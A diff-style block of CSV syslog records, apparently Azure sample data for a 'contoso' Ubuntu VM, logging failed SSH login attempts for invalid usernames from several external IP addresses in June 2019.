+8469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:26,UbuntuDevEnv,2019-06-11 13:01:26,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 89.101.149.137 port 20848 [preauth],90137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,89.101.149.1,20848,,
+8470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:26,UbuntuDevEnv,2019-06-11 13:01:26,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20848:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20848,,
+8471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:26,UbuntuDevEnv,2019-06-11 13:01:26,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20866,90148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20866,,
+8472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:26,UbuntuDevEnv,2019-06-11 13:01:26,auth,UbuntuDevEnv,info,Invalid user suse-gm from 89.101.149.137 port 20867,90149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suse,89.101.149.1,20867,,
+8473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:26,UbuntuDevEnv,2019-06-11 13:01:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:26,UbuntuDevEnv,2019-06-11 13:01:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+8475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:27,UbuntuDevEnv,2019-06-11 13:01:27,auth,UbuntuDevEnv,info,Failed password for invalid user suse-gm from 89.101.149.137 port 20867 ssh2,90149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suse,89.101.149.1,20867,,
+8476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:27,UbuntuDevEnv,2019-06-11 13:01:27,auth,UbuntuDevEnv,info,Disconnected from invalid user suse-gm 89.101.149.137 port 20867 [preauth],90149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suse,89.101.149.1,20867,,
+8477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:27,UbuntuDevEnv,2019-06-11 13:01:27,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20867:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20867,,
+8478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:02:20,UbuntuDevEnv,2019-06-11 13:02:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 21412,90339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,21412,,
+8479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:18:46,UbuntuDevEnv,2019-06-25 21:18:45,auth,UbuntuDevEnv,info,Connection closed by 84.92.39.93 port 44868 [preauth],7567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,84.92.39.9,44868,,
+8480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:22:54,UbuntuDevEnv,2019-06-25 21:22:54,auth,UbuntuDevEnv,info,Connection closed by 119.29.198.228 port 50982 [preauth],8447,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.29.198.2,50982,,
+8481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:24:05,UbuntuDevEnv,2019-06-25 21:24:04,auth,UbuntuDevEnv,info,Invalid user cui from 134.209.233.74 port 39052,8700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cui,134.209.233.7,39052,,
+8482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:24:05,UbuntuDevEnv,2019-06-25 21:24:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:24:05,UbuntuDevEnv,2019-06-25 21:24:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,8700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:24:07,UbuntuDevEnv,2019-06-25 21:24:06,auth,UbuntuDevEnv,info,Failed password for invalid user cui from 134.209.233.74 port 39052 ssh2,8700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cui,134.209.233.7,39052,,
+8485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:24:07,UbuntuDevEnv,2019-06-25 21:24:06,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 39052:11: Bye Bye [preauth],8700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,39052,,
+8486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:24:07,UbuntuDevEnv,2019-06-25 21:24:06,auth,UbuntuDevEnv,info,Disconnected from invalid user cui 134.209.233.74 port 39052 [preauth],8700,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cui,134.209.233.7,39052,,
+8487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:25:30,UbuntuDevEnv,2019-06-25 21:25:29,auth,UbuntuDevEnv,info,Invalid user registry from 134.209.233.74 port 56600,9006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,registry,134.209.233.7,56600,,
+8488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:25:30,UbuntuDevEnv,2019-06-25 21:25:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,9006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:25:30,UbuntuDevEnv,2019-06-25 21:25:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:25:32,UbuntuDevEnv,2019-06-25 21:25:32,auth,UbuntuDevEnv,info,Failed password for invalid user registry from 134.209.233.74 port 56600 ssh2,9006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,registry,134.209.233.7,56600,,
+8491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:25:32,UbuntuDevEnv,2019-06-25 21:25:32,auth,UbuntuDevEnv,info,Disconnected from invalid user registry 134.209.233.74 port 56600 [preauth],9006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,registry,134.209.233.7,56600,,
+8492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:25:32,UbuntuDevEnv,2019-06-25 21:25:32,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 56600:11: Bye Bye [preauth],9006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,56600,,
+8493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:26:49,UbuntuDevEnv,2019-06-25 21:26:49,auth,UbuntuDevEnv,info,Invalid user im from 134.209.233.74 port 45424,9311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,im,134.209.233.7,45424,,
+8494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:26:49,UbuntuDevEnv,2019-06-25 21:26:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,9311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:26:49,UbuntuDevEnv,2019-06-25 21:26:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:26:51,UbuntuDevEnv,2019-06-25 21:26:51,auth,UbuntuDevEnv,info,Failed password for invalid user im from 134.209.233.74 port 45424 ssh2,9311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,im,134.209.233.7,45424,,
+8497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:26:51,UbuntuDevEnv,2019-06-25 21:26:51,auth,UbuntuDevEnv,info,Disconnected from invalid user im 134.209.233.74 port 45424 [preauth],9311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,im,134.209.233.7,45424,,
+8498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:26:51,UbuntuDevEnv,2019-06-25 21:26:51,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 45424:11: Bye Bye [preauth],9311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,45424,,
+8499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:28:08,UbuntuDevEnv,2019-06-25 21:28:08,auth,UbuntuDevEnv,info,Invalid user clerk from 134.209.233.74 port 34250,9596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clerk,134.209.233.7,34250,,
+8500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:28:08,UbuntuDevEnv,2019-06-25 21:28:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,9596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:28:08,UbuntuDevEnv,2019-06-25 21:28:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:28:10,UbuntuDevEnv,2019-06-25 21:28:10,auth,UbuntuDevEnv,info,Failed password for invalid user clerk from 134.209.233.74 port 34250 ssh2,9596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clerk,134.209.233.7,34250,,
+8503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:28:10,UbuntuDevEnv,2019-06-25 21:28:10,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 34250:11: Bye Bye [preauth],9596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,34250,,
+8504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:28:10,UbuntuDevEnv,2019-06-25 21:28:10,auth,UbuntuDevEnv,info,Disconnected from invalid user clerk 134.209.233.74 port 34250 [preauth],9596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,clerk,134.209.233.7,34250,,
+8505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:29:35,UbuntuDevEnv,2019-06-25 21:29:34,auth,UbuntuDevEnv,info,Invalid user default from 134.209.233.74 port 51308,9893,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,134.209.233.7,51308,,
+8506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:29:35,UbuntuDevEnv,2019-06-25 21:29:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9893,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:29:35,UbuntuDevEnv,2019-06-25 21:29:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,9893,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:29:37,UbuntuDevEnv,2019-06-25 21:29:36,auth,UbuntuDevEnv,info,Failed password for invalid user default from 134.209.233.74 port 51308 ssh2,9893,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,134.209.233.7,51308,,
+8509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:29:37,UbuntuDevEnv,2019-06-25 21:29:36,auth,UbuntuDevEnv,info,Disconnected from invalid user default 134.209.233.74 port 51308 [preauth],9893,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,default,134.209.233.7,51308,,
+8510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:29:37,UbuntuDevEnv,2019-06-25 21:29:36,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 51308:11: Bye Bye [preauth],9893,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,51308,,
+8511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:28,UbuntuDevEnv,2019-06-25 21:30:27,auth,UbuntuDevEnv,info,Invalid user ftpuser from 165.22.96.224 port 58004,10113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,165.22.96.2,58004,,
+8512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:28,UbuntuDevEnv,2019-06-25 21:30:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,10113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:28,UbuntuDevEnv,2019-06-25 21:30:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:30,UbuntuDevEnv,2019-06-25 21:30:29,auth,UbuntuDevEnv,info,Failed password for invalid user ftpuser from 165.22.96.224 port 58004 ssh2,10113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,165.22.96.2,58004,,
+8515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:30,UbuntuDevEnv,2019-06-25 21:30:29,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 58004:11: Bye Bye [preauth],10113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,58004,,
+8516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:30,UbuntuDevEnv,2019-06-25 21:30:29,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpuser 165.22.96.224 port 58004 [preauth],10113,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,165.22.96.2,58004,,
+8517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:58,UbuntuDevEnv,2019-06-25 21:30:58,auth,UbuntuDevEnv,info,Invalid user camera from 134.209.233.74 port 40134,10276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,camera,134.209.233.7,40134,,
+8518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:58,UbuntuDevEnv,2019-06-25 21:30:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:30:58,UbuntuDevEnv,2019-06-25 21:30:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,10276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:31:01,UbuntuDevEnv,2019-06-25 21:31:00,auth,UbuntuDevEnv,info,Failed password for invalid user camera from 134.209.233.74 port 40134 ssh2,10276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,camera,134.209.233.7,40134,,
+8521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:31:01,UbuntuDevEnv,2019-06-25 21:31:00,auth,UbuntuDevEnv,info,Disconnected from invalid user camera 134.209.233.74 port 40134 [preauth],10276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,camera,134.209.233.7,40134,,
+8522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:31:01,UbuntuDevEnv,2019-06-25 21:31:00,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 40134:11: Bye Bye [preauth],10276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,40134,,
+8523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:32:20,UbuntuDevEnv,2019-06-25 21:32:19,auth,UbuntuDevEnv,info,Invalid user node from 134.209.233.74 port 57190,10567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,node,134.209.233.7,57190,,
+8524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:32:20,UbuntuDevEnv,2019-06-25 21:32:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,10567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:32:20,UbuntuDevEnv,2019-06-25 21:32:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:32:22,UbuntuDevEnv,2019-06-25 21:32:22,auth,UbuntuDevEnv,info,Failed password for invalid user node from 134.209.233.74 port 57190 ssh2,10567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,node,134.209.233.7,57190,,
+8527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:32:22,UbuntuDevEnv,2019-06-25 21:32:22,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 57190:11: Bye Bye [preauth],10567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,57190,,
+8528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:32:22,UbuntuDevEnv,2019-06-25 21:32:22,auth,UbuntuDevEnv,info,Disconnected from invalid user node 134.209.233.74 port 57190 [preauth],10567,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,node,134.209.233.7,57190,,
